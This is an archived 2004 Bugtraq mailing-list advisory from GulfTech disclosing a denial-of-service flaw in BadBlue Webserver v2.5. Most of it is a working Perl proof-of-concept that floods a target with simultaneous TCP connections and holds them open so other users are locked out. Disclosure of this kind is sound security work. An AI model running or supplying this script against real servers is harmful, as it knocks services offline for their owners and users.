lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 20 Aug 2004 07:10:04 -0500
From: "GulfTech Security" <security@...ftech.org>
To: <bugtraq@...urityfocus.com>
Subject: BadBlue Webserver v2.5 Denial Of Service Vulnerability


##########################################################
# GulfTech Security Research	         August, 18th 2004
##########################################################
# Vendor  : BadBlue
# URL     : http://www.badblue.com
# Version : BadBlue Webserver v2.5
# Risk    : Denial of Service
##########################################################

Description:
Share photos, videos, music, and business files with friends 
and colleagues instantly. Tired of paying a service to share 
your files (and the hassle of sending your files to their 
site) BadBlue shares files directly from your own PC, using 
the cable /DSL/broadband/dialup connection you already paid 
for! BadBlue lets you run a no-hassle Web site on your own 
PC for free, including a domain name you can choose. Within 
seconds, you can transform your PC into a friendly, file 
sharing Web server with all the power of a real server on the 
Internet. Remote users can search for files, explore your 
shared folders, and run full-blown applications created in 
HTML, PHP, Perl, and so on.



Denial of Service:
BadBlue Webserver cannot handle multiple connections from the 
same host, and will deny all acess to any users at right around 
twenty four simultaneous connections.I have included a proof of 
concept that floods the target server with a number of connections, 
and then basically keeps those connections up for as long as you 
specify, thus blocking all other traffic to the affected server. 



#!/usr/bin/perl
##############################################################
# BadBlue v2.52 Web Server - Multiple Connections DoS POC Code
##############################################################
# BadBlue Web Server can not handle many simultaneous connects
# from the same host, and will lock up until the connects stop
##############################################################
# This Proof Of Concept Written By GulfTech Security Research
##############################################################
 
  use Strict; 
  use Socket;
  use IO::Socket;

  my $host = $ARGV[0];
  my $port = $ARGV[1];
  my $stop = $ARGV[2];
  my $size = 1000;
  my $prot = getprotobyname('tcp');
  my $slep = $ARGV[3];

printf("================================================\n");
printf(" BadBlue v2.52 Web Server Denial Of Service POC \n");
printf("================================================\n");
printf("[*] Making %d Connections To %s \n", $stop , $host);

for ($i=1; $i<$stop; $i++)
{
  socket($i, PF_INET, SOCK_STREAM, $prot ); 
  my $dest = sockaddr_in ($port, inet_aton($host));
  connect($i, $dest);
}

  CheckServer($host, $i, $slep, $stop);
  KillThreads($stop);
  printf("[*] Exploit Attempt Unsuccesful");
  exit;

sub CheckServer($host, $i, $slep, $stop) {
   ($host, $i, $slep, $stop) = @_;
   $blank   = "\015\012" x 2;
   $request = "GET / HTTP/1.0".$blank;
   $remote  = IO::Socket::INET->new( Proto => "tcp",
                                     PeerAddr  => $host,
                                     PeerPort  => $port,
                                     Timeout   => '10000',
                                     Type      => SOCK_STREAM,
				   );   
   print $remote $request;
   unless ( <$remote> )
   {
      printf("[*] Host %s Has Been Successfully DoS'ed\n", $host);
      printf("[*] The Host Will Be Down For %d Seconds\n", $slep);
      sleep($slep);
      KillThreads($stop);
      exit;
   }
}

sub KillThreads($stop) {
$stop = @_;
printf("[*] Killing All active Connections");
for ($l=1; $l<$stop; $l++) {
   shutdown($l,2)|| die("Couldn't Shut Down Socket");
   $l++;
 }
}


Solution:
The development team has been contacted and said they will be 
looking into this issue shortly. Users are advised to upgrade 
as soon as possible. 



Related Info:
The original advisory can be found at the following location 
http://www.gulftech.org/?node=research&article_id=00042-08202004



Credits:
James Bercegay of the GulfTech Security Research Team

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ